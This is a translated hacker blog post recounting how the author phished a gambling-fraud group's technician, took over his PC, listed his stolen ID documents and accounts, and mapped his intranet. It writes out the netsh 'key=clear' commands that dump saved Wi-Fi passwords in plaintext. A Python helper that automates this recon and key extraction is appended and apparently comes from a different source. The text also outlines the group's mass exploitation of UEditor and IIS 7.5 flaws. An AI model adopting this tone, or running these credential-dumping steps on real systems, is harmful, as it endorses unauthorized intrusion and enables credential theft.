
Title: A wonderful story about encountering a certain group and then invading a certain BC intranet


01 Preface

I have been wandering around recently and happened to meet someone in a group who was hiring programmers to help write exploits and shells and was collecting 0days. I also felt there was nothing to write an article about lately, so I gave social engineering a shot.

First, let's ask about the setup and see what he does.

1049983-20240509092510634-1287905194.jpg

This person wants to find someone to help write batch exploits.

s3hhx15awad17378.png

Then I pretended I could write them: first set the trap, get into the role, and make the other party believe I really can.

z2feefwpbx217381.png

Here I said I had built a site myself for testing, and asked him to connect to the shell and try it out.

2ghe4p4b13217385.png

The target was not online at the time, so he sent the site I built to two of their other people.

tpby5pvvx4h17388.png

02 Technician No. 1

The person I social-engineered did not actually understand the technology himself. He sent my phishing page to two technicians under him. One of them was probably running a virtual machine and the other a physical machine, so I only got one catch here.

Two PCs came online here; they share a single external egress IP, which geolocates to Cambodia (whether that is genuine is unknown). This person is what we call a script kiddie. Let me show you what information is on his PC.

yicybubkpkq17391.png

Script Trojan

2b0cvuomnyn17395.png

All kinds of real-name ID documents

edkmzyhs41z17398.png

Various batch hacking tools

nywtwsl4mgv17401.png

Black Hat SEO keywords

k2nrbk4llq417404.png

Various VPS machines used for intrusions

n45iwxgwo0j17407.png

Accounts for various websites

1hsk0wt14fa17410.png

03 Intranet expansion and penetration

Each process has an environment block containing a set of environment variables and their values. There are two types of environment variables, user environment variables and system environment variables.

I ran arp -a and found the following machines, more than 10 of them:

192.168.1.1 78-44-fd-fd-55-b9 Dynamic
192.168.1.13 6c-8d-c1-18-aa-b2 Dynamic
192.168.1.24 dc-2b-2a-c2-22-15 Dynamic
192.168.1.42 8c-8e-f2-4f-26-8f Dynamic
192.168.1.54 b0-fc-36-29-f7-ab Dynamic
192.168.1.62 b4-d5-bd-b2-29-e2 Dynamic
192.168.1.81 38-53-9c-ee-31-7e Dynamic
192.168.1.83 38-71-de-13-4f-d8 Dynamic
192.168.1.92 cc-29-f5-bc-b8-c1 Dynamic
192.168.1.119 cc-44-63-18-08-4c Dynamic
192.168.1.137 6c-72-e7-5e-f9-7e Dynamic
192.168.1.143 a4-d9-31-89-3d-c4 Dynamic
192.168.1.149 48-3b-38-45-4d-22 Dynamic
192.168.1.171 cc-29-f5-78-70-87 Dynamic
192.168.1.178 00-b3-62-7d-11-f6 Dynamic
192.168.1.206 b0-fc-36-30-79-7b Dynamic
192.168.1.233 e4-f8-9c-9f-61-fe Dynamic
192.168.1.243 dc-41-5f-05-fe-ef Dynamic
192.168.1.255 ff-ff-ff-ff-ff-ff Static
224.0.0.22 01-00-5e-00-00-16 Static
224.0.0.252 01-00-5e-00-00-fc Static
224.210.34.44 01-00-5e-52-22-2c Static
239.11.20.1 01-00-5e-0b-14-01 Static
239.255.255.250 01-00-5e-7f-ff-fa Static
255.255.255.255 ff-ff-ff-ff-ff-ff Static

Next, read the Wi-Fi profiles and passwords saved on the current computer:

netsh wlan show profiles

All User Profile : 2317RL-5G
All User Profile : 2317-ATA-5G
All User Profile : HUAWEI-D91C
All User Profile : TP-LINK_6A68
All User Profile : Airtel-E5573-8318
All User Profile : TP-LINK_88T8
All User Profile : TB-LINK-96A9

Then, for each profile name listed above, dump the profile with key=clear so the saved key is shown in plaintext:

netsh wlan show profile name="<profile name from the list above>" key=clear

30uzug52gcs17411.png

Continue to collect information

This is the hacker going online.

vdojinkxqws17412.png

04 Second

After three days of monitoring, I found out how the hacker makes money. This person has an agent management platform for a BC (gambling) operation open, as follows:

4adcm2h21qe17413.png

After analyzing his account, I found that it was an agent account. Then I downloaded its APP for analysis and found that everything on it is time-based lotteries and gambling games, much like horse racing, except his is car racing. The backend generates a large number of bots to make it look like many people are playing with you.

fo2oznj51be17414.png

The bots alone number more than 240.

There are fewer than 10 real users online.

qkjat01tu2s17415.png

abohubp5umv17416.png

The hacker's daily work is as follows:

Using 0day vulnerabilities such as the latest UEditor upload vulnerability, the IIS 7.5 parsing vulnerability, DedeCMS exploits, and other mass-exploitable vulnerabilities,

with a batch exploitation tool as his most commonly used tool:

d4f1rgpnv0u17417.png

oir5xp3ddq417418.png

clsekjk2uzr17419.png

he then uploads his BC page, gets users to download the APP and enter the room where he is the agent. In this way, the money users recharge in the room is credited to the agent, which is how he profits.

As of now, the hacker is still batch-exploiting the IIS 7.5 parsing vulnerability.

x2mag4kig3y17420.png

More than 3 million URLs have been imported to batch-exploit the UEditor upload vulnerability.

Original link address: https://www.hackdoor.org/d/216-bc
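The two recon steps in section 03 (host discovery from the ARP cache, then harvesting saved Wi-Fi keys via netsh) are usually done by hand, as in the post. Below is an added helper, not part of the original post or the tools it describes, that parses that same Windows command output into structured data: it drops broadcast/multicast noise from `arp -a`, pulls profile names out of `netsh wlan show profiles`, builds the `key=clear` follow-up commands, and extracts the "Key Content" line from a profile dump. The sample outputs are constructed (the ARP and profile entries are taken from the post's listings; the interface address, the profile detail and its key are made up for illustration), and the ".255 means broadcast" rule assumes a /24 network as in the post.

```python
"""Parse Windows recon output (arp -a, netsh wlan) into structured data.

Added example; sample command output below is constructed, not captured.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import Optional

# Constructed `arp -a` output. Neighbour entries copied from the post's listing;
# the interface address 192.168.1.100 is an assumption for the sample.
ARP_SAMPLE = """\
Interface: 192.168.1.100 --- 0xc
  Internet Address      Physical Address      Type
  192.168.1.1           78-44-fd-fd-55-b9     dynamic
  192.168.1.13          6c-8d-c1-18-aa-b2     dynamic
  192.168.1.81          38-53-9c-ee-31-7e     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
"""

# Constructed `netsh wlan show profiles` output (English locale layout).
NETSH_PROFILES_SAMPLE = """\
Profiles on interface Wi-Fi:

User profiles
-------------
    All User Profile     : 2317RL-5G
    All User Profile     : 2317-ATA-5G
    All User Profile     : HUAWEI-D91C
    All User Profile     : TP-LINK_6A68
"""

# Constructed `netsh wlan show profile name="TP-LINK_6A68" key=clear` output;
# the key value is invented for the example.
PROFILE_DETAIL_SAMPLE = """\
Profile TP-LINK_6A68 on interface Wi-Fi:
Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : examplepassword123
"""

ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(dynamic|static)\s*$",
    re.IGNORECASE,
)
PROFILE_LINE = re.compile(r"^\s*All User Profiles?\s*:\s*(.+?)\s*$", re.IGNORECASE)
KEY_LINE = re.compile(r"^\s*Key Content\s*:\s*(.+?)\s*$", re.IGNORECASE)


@dataclass(frozen=True)
class ArpEntry:
    ip: str
    mac: str
    kind: str  # "dynamic" or "static"


def parse_arp(output: str) -> list[ArpEntry]:
    """Return every IP/MAC/type row from `arp -a`, skipping headers."""
    entries = []
    for line in output.splitlines():
        m = ARP_LINE.match(line)
        if m:
            entries.append(ArpEntry(m.group(1), m.group(2).lower(), m.group(3).lower()))
    return entries


def is_noise(entry: ArpEntry) -> bool:
    """True for broadcast/multicast rows that are not real neighbours."""
    ip = IPv4Address(entry.ip)
    return (
        ip.is_multicast
        or ip == IPv4Address("255.255.255.255")
        or entry.mac == "ff-ff-ff-ff-ff-ff"
        or entry.mac.startswith("01-00-5e")  # IPv4 multicast MAC prefix
        or entry.ip.endswith(".255")  # assumes a /24 subnet broadcast, as in the post
    )


def live_hosts(arp_output: str) -> list[str]:
    """IPs of real neighbours seen in the ARP cache, in listing order."""
    return [e.ip for e in parse_arp(arp_output) if not is_noise(e)]


def parse_profiles(netsh_output: str) -> list[str]:
    """Saved Wi-Fi profile names from `netsh wlan show profiles`."""
    return [m.group(1) for line in netsh_output.splitlines() if (m := PROFILE_LINE.match(line))]


def key_clear_command(profile: str) -> str:
    """The follow-up command that prints the profile's PSK in plaintext."""
    return f'netsh wlan show profile name="{profile}" key=clear'


def extract_key(profile_output: str) -> Optional[str]:
    """Pull the plaintext key from a `key=clear` profile dump, or None if absent."""
    for line in profile_output.splitlines():
        m = KEY_LINE.match(line)
        if m:
            return m.group(1)
    return None


if __name__ == "__main__":
    print("neighbours:", live_hosts(ARP_SAMPLE))
    for name in parse_profiles(NETSH_PROFILES_SAMPLE):
        print(key_clear_command(name))
    print("TP-LINK_6A68 key:", extract_key(PROFILE_DETAIL_SAMPLE))
```

On a real host you would feed `subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout` and the netsh equivalents into these functions instead of the constructed samples; note that `netsh` output is localized, so the `All User Profile` and `Key Content` labels differ on non-English Windows installs (the post's machine printed a translated label) and the regexes would need the local strings.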
